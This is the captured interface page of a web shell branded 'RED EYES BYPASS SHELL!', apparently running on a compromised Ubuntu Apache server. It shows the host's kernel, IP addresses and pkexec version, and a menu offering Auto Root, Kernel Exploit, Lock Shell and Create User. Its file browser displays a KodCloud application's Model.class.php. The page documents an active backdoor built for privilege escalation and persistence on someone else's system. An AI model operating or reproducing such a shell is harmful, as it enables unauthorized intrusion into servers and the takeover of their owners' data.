Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
user /
app /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Application.class.php
2.68
KB
-rw-r--r--
Controller.class.php
1.44
KB
-rw-r--r--
Model.class.php
627
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Model.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ /** * 模型抽象类 * 一个关于各种模型的基本行为类,每个模型都必须继承这个类的方法 */ abstract class Model { var $db = null; var $in; var $config; /** * 构造函数 * @return Null */ function __construct(){ global $config, $in; $this -> in = &$in; $this -> config = &$config; } /** * TODO db */ function db(){ if ($this ->db != NULL) { return $this ->db; }else{ } } }
Close